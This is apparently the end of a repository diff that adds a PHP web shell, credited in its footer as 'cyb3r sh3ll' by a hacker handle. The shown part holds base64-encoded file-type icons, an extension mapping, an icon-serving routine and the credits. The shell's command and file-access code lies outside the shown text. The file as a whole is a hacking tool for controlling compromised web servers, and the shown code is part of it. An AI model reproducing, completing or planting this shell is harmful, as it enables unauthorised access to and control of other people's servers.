+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". + +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". + +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". + +"RYtMAgEAOw==", + +"ext_cmd"=> + +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". + +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". + +"dmrYAMn1onq/YKpjvEgAADs=", + +"ext_cpp"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". + +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". + +"Eq7YrLDE7a4SADs=", + +"ext_ini"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". + +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". + +"SnEjgPVarHEHgrB43JvszsQEADs=", + +"ext_diz"=> + +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". + +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". + +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". + +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". + +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". + +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". + +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". + +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". + +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". + +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". + +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". + +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". + +"Ow==", + +"ext_doc"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". + +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". + +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", + +"ext_exe"=> + +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". + +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". + +"xhIAOw==", + +"ext_h"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". + +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". + +"Wq/NknbbSgAAOw==", + +"ext_hpp"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". + +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". + +"UqUagnbLdZa+YFcCADs=", + +"ext_htaccess"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". + +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". + +"AAA7", + +"ext_html"=> + +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". + +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". + +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". + +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". + +"ADs=", + +"ext_jpg"=> + +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". + +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". + +"FxEAOw==", + +"ext_js"=> + +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". + +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". + +"a00AjYYBbc/o9HjNniUAADs=", + +"ext_lnk"=> + +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". + +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". + +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". + +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". + +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". + +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". + +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". + +"ADs=", + +"ext_log"=> + +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". + +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", + +"ext_php"=> + +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". + +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", + +"ext_pl"=> + +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". + +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", + +"ext_swf"=> + +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". + +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". + +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". + +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". + +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", + +"ext_tar"=> + +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". + +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". + +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". + +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". + +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". + +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". + +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". + +"u4tLAgEAOw==", + +"ext_txt"=> + +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". + +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". + +"UpPWG3Ig6Hq/XmRjuZwkAAA7", + +"ext_wri"=> + +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". + +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", + +"ext_xml"=> + +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". + +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". + +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". + +"IQA7" + + ); + + //For simple size- and speed-optimization. + + $imgequals = array( + + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + + "ext_html"=>array("ext_html","ext_htm"), + + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + + "ext_lnk"=>array("ext_lnk","ext_url"), + + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + + "ext_doc"=>array("ext_doc","ext_dot"), + + "ext_js"=>array("ext_js","ext_vbs"), + + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + + "ext_wri"=>array("ext_wri","ext_rtf"), + + "ext_swf"=>array("ext_swf","ext_fla"), + + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + + ); + + if (!$getall) + + { + + header("Content-type: image/gif"); + + header("Cache-control: public"); + + header("Cache-control: max-age=".(60*60*24*7)); + + header("Last-Modified: ".date("r",filemtime(__FILE__))); + + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + + if (empty($images[$img])) {$img = "small_unk";} + + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + + echo base64_decode($images[$img]); + + } + + else + + { + + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + + natsort($images); + + $k = array_keys($images); + + echo "
    "; + + foreach ($k as $u) {echo $u.":
    ";} + + echo "
    "; + + } + + exit; + +} + +?> + +
    + +
    (C) Copyright cyb3r 9l4d!470r [All rights reserved]
    Greetz to : r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.
    --[ cyb3r sh3ll v. Coded by cyb3r 9l4d!470r (cyber gladiator) | h4cK2b0yZz.. | Generation time: ]--
    +
    + + + \ No newline at end of file -- cgit v1.3